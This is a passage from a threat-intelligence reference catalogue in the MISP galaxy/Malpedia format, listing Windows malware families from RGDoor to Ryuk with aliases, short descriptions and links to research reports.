https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/
https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles
https://www.secureworks.com/research/threat-profiles/gold-southfield
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/
https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf
https://asec.ahnlab.com/ko/19640/
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/
https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/
https://intel471.com/blog/changes-in-revil-ransomware-version-2-2
https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html
https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos

RGDoor

The tag is: misp-galaxy:malpedia="RGDoor"

RGDoor is also known as:

Table 2523. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor
https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view
https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/
https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae
https://www.secureworks.com/research/threat-profiles/cobalt-lyceum
https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf
https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/
https://www.secureworks.com/research/threat-profiles/cobalt-gypsy
https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran
https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf
https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/

Rhino

Ransomware.

The tag is: misp-galaxy:malpedia="Rhino"

Rhino is also known as:

Table 2524. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino
https://www.vmray.com/cyber-security-blog/rhino-ransomware-malware-analysis-spotlight/

RHttpCtrl

The tag is: misp-galaxy:malpedia="RHttpCtrl"

RHttpCtrl is also known as:

Table 2525. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhttpctrl
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/

Rietspoof

Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.

The tag is: misp-galaxy:malpedia="Rietspoof"

Rietspoof is also known as:

Table 2526. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof
https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-spoofing-reeds-rietspoof/
https://decoded.avast.io/threatintel/spoofing-in-the-reeds-with-rietspoof/
https://blog.avast.com/rietspoof-malware-increases-activity

Rifdoor

The tag is: misp-galaxy:malpedia="Rifdoor"

Rifdoor is also known as:

Table 2527. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
AhnLabAndariel_a_Subgroup_of_Lazarus%20(3).pdf[AhnLabAndariel_a_Subgroup_of_Lazarus%20(3).pdf]
https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/

Rikamanu

The tag is: misp-galaxy:malpedia="Rikamanu"

Rikamanu is also known as:

Table 2528. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu
https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

Rincux

The tag is: misp-galaxy:malpedia="Rincux"

Rincux is also known as:

Table 2529. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux
https://www.virusbulletin.com/uploads/pdf/conference_slides/2011/Edwards-Nazario-VB2011.pdf

Ripper ATM

The tag is: misp-galaxy:malpedia="Ripper ATM"

Ripper ATM is also known as:

Table 2530. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm
http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/
https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf

Rising Sun

The tag is: misp-galaxy:malpedia="Rising Sun"

Rising Sun is also known as:

Table 2531. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

RMS

CyberInt states that Remote Manipulator System (RMS) is a legitimate tool developed by Russian organization TektonIT and has been observed in campaigns conducted by TA505 as well as numerous smaller campaigns likely attributable to other, disparate, threat actors. In addition to the availability of commercial licenses, the tool is free for non-commercial use and supports the remote administration of both Microsoft Windows and Android devices.

The tag is: misp-galaxy:malpedia="RMS"

RMS is also known as:

Gussdoor
Remote Manipulator System

Table 2532. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rms
https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf
https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf
https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/
https://blog.yoroi.company/research/ta505-is-expanding-its-operations/
https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks
https://awakesecurity.com/blog/catching-the-white-stork-in-flight/

RobinHood

The tag is: misp-galaxy:malpedia="RobinHood"

RobinHood is also known as:

RobbinHood

Table 2533. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.robinhood
https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf
https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf
https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/
https://krebsonsecurity.com/2019/06/report-no-eternal-blue-exploit-found-in-baltimore-city-ransomware/
https://www.sentinelone.com/blog/robinhood-ransomware-coolmaker-function-not-cool/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/
https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/
https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf
https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/
https://goggleheadedhacker.com/blog/post/12
https://twitter.com/VK_Intel/status/1121440931759128576
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/
https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

rock

The tag is: misp-galaxy:malpedia="rock"

rock is also known as:

yellowalbatross

Table 2534. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rock

Rockloader

The tag is: misp-galaxy:malpedia="Rockloader"

Rockloader is also known as:

Table 2535. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

Rofin

The tag is: misp-galaxy:malpedia="Rofin"

Rofin is also known as:

Table 2536. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin

RogueRobinNET

A .NET variant of ps1.roguerobin

The tag is: misp-galaxy:malpedia="RogueRobinNET"

RogueRobinNET is also known as:

Table 2537. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin
https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/
https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/
https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/
https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/
https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/

Rokku

The tag is: misp-galaxy:malpedia="Rokku"

Rokku is also known as:

Table 2538. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku
https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/

RokRAT

It is a backdoor commonly distributed as an encoded binary file downloaded and decrypted by shellcode following the exploitation of weaponized documents. DOGCALL is capable of capturing screenshots, logging keystrokes, evading analysis with anti-virtual machine detections, and leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex.

The tag is: misp-galaxy:malpedia="RokRAT"

RokRAT is also known as:

DOGCALL

Table 2539. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat
https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/
https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf
https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/
http://v3lo.tistory.com/24
https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/
http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf
http://blog.talosintelligence.com/2017/04/introducing-rokrat.html
https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48
https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/
http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html
https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection
https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf
https://www.youtube.com/watch?v=uoBQE5s2ba4
https://securelist.com/apt-trends-report-q2-2019/91897/
https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/
https://www.ibm.com/downloads/cas/Z81AVOY7
https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/
https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/
http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html
https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

Rombertik

The tag is: misp-galaxy:malpedia="Rombertik"

Rombertik is also known as:

CarbonGrabber

Table 2540. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik
http://blogs.cisco.com/security/talos/rombertik

Romeo(Alfa,Bravo, …)

The tag is: misp-galaxy:malpedia="Romeo(Alfa,Bravo, …)"

Romeo(Alfa,Bravo, …) is also known as:

Table 2541. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos

Roopirs

The tag is: misp-galaxy:malpedia="Roopirs"

Roopirs is also known as:

Table 2542. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs

Roseam

The tag is: misp-galaxy:malpedia="Roseam"

Roseam is also known as:

Table 2543. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam
http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/

RotorCrypt

Ransomware that was discovered over the last months of 2016 and likely based on Gomasom, another ransomware family.

The tag is: misp-galaxy:malpedia="RotorCrypt"

RotorCrypt is also known as:

RotoCrypt
Rotor

Table 2544. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rotorcrypt
https://id-ransomware.blogspot.com/2016/10/rotorcrypt-ransomware.html
https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/

Rover

The tag is: misp-galaxy:malpedia="Rover"

Rover is also known as:

Table 2545. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rover
http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/
https://securelist.com/apt-trends-report-q3-2020/99204/

Rovnix

Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least).

The tag is: misp-galaxy:malpedia="Rovnix"

Rovnix is also known as:

BkLoader
Cidox
Mayachok

Table 2546. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix
https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/
https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf
https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/
https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/
http://www.malwaretech.com/2014/05/rovnix-new-evolution.html
https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/
http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981
https://securelist.com/oh-what-a-boot-iful-mornin/97365

RoyalCli

RoyalCli is a backdoor which appears to be an evolution of BS2005 and uses familiar encryption and encoding routines. The name RoyalCli was chosen by us due to a debugging path left in the binary. RoyalCli and BS2005 both communicate with the attacker’s command and control (C2) through Internet Explorer (IE) by using the COM interface IWebBrowser2.

The tag is: misp-galaxy:malpedia="RoyalCli"

RoyalCli is also known as:

Table 2547. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli
https://github.com/nccgroup/Royal_APT
https://www.secureworks.com/research/threat-profiles/bronze-palace
https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

Royal DNS

RoyalDNS is a DNS based backdoor used by APT15 that persistences on a system through a service called 'Nwsapagent'.

The tag is: misp-galaxy:malpedia="Royal DNS"

Royal DNS is also known as:

Table 2548. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns
https://github.com/nccgroup/Royal_APT
https://www.secureworks.com/research/threat-profiles/bronze-palace
https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

Rozena

The tag is: misp-galaxy:malpedia="Rozena"

Rozena is also known as:

Table 2549. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena
https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena

RTM

RTM Banker also known as Redaman was first blogged about in February 2017 by ESET. The malware is written in Delphi and shows some similarities (like process list) with Buhtrap. It uses a slightly modified version of RC4 to encrypt its strings, network data, configuration and modules, according to ESET.

The tag is: misp-galaxy:malpedia="RTM"

RTM is also known as:

Redaman

Table 2550. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm
https://securelist.com/financial-cyberthreats-in-2020/101638/
https://www.youtube.com/watch?v=YXnNO3TipvM
https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf
http://www.peppermalware.com/2019/11/brief-analysis-of-redaman-banking.html
https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/
https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/

rtpos

The tag is: misp-galaxy:malpedia="rtpos"

rtpos is also known as:

Table 2551. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos
https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf

Ruckguv

The tag is: misp-galaxy:malpedia="Ruckguv"

Ruckguv is also known as:

Table 2552. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv
https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear

Rumish

The tag is: misp-galaxy:malpedia="Rumish"

Rumish is also known as:

Table 2553. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish

running_rat

The tag is: misp-galaxy:malpedia="running_rat"

running_rat is also known as:

Table 2554. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat

Rurktar

The tag is: misp-galaxy:malpedia="Rurktar"

Rurktar is also known as:

RCSU

Table 2555. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar
https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction

Rustock

The tag is: misp-galaxy:malpedia="Rustock"

Rustock is also known as:

Table 2556. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock
http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf
http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html
https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf
http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html
https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html
https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/
http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf
https://www.secureworks.com/blog/research-21041
http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/

Ryuk

Ryuk is a ransomware which encrypts its victim’s files and asks for a ransom via bitcoin to release the original files. It is has been observed being used to attack companies or professional environments. Cybersecurity experts figured out that Ryuk and Hermes ransomware shares pieces of codes. Hermes is commodity ransomware that has been observed for sale on dark-net forums and used by multiple threat actors.

The tag is: misp-galaxy:malpedia="Ryuk"

Ryuk is also known as:

Table 2557. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk
https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/
https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/
https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/
https://community.riskiq.com/article/0bcefe76
https://www.hhs.gov/sites/default/files/bazarloader.pdf
https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound
https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/
https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html
https://twitter.com/ffforward/status/1324281530026524672
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf
https://www.crowdstrike.com/blog/wizard-spider-adversary-update/
https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf
https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html
https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2[https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2]
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/
https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/
https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/
https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike
https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/
https://blog.reversinglabs.com/blog/hunting-for-ransomware
https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/
https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/
https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html
https://www.scythe.io/library/threatthursday-ryuk
https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html
https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/
https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv
https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/
https://sites.temple.edu/care/ci-rw-attacks/
https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/
https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/
https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/
https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware
https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/
https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/
https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/
https://twitter.com/IntelAdvanced/status/1353546534676258816
https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf
https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/
https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/
https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://twitter.com/SecurityJoes/status/1402603695578157057
https://github.com/scythe-io/community-threats/tree/master/Ryuk
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/
https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/
https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf
https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/
https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes
https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html
https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/
https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/
https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/
https://community.riskiq.com/article/c88cf7e6
https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf
https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/
https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon
https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12
https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf
https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html
https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf
https://www.secureworks.com/research/threat-profiles/gold-ulrick
https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/
https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/
https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP
https://www.youtube.com/watch?v=HwfRxjV2wok
https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes
https://www.youtube.com/watch?v=CgDtm05qApE
https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/
https://unit42.paloaltonetworks.com/ryuk-ransomware/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://twitter.com/Prosegur/status/1199732264386596864
https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/
https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders
https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf
https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf
https://www.youtube.com/watch?v=LUxOcpIRxmg
https://www.youtube.com/watch?v=BhjQ6zsCVSc
https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/
https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456
https://blogs.quickheal.com/deep-dive-wakeup-lan-wol-implementation-ryuk/
https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware
https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit_John_Hammond_Huntress_Analyzing_Ryuk.pdf[https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit_John_Hammond_Huntress_Analyzing_Ryuk.pdf]
https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets
https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors
https://twitter.com/SophosLabs/status/1321844306970251265
https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware
https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/
https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/
https://blog.cyberint.com/ryuk-crypto-ransomware
https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion
https://thedfirreport.com/2021/01/31/bazar-no-ryuk/
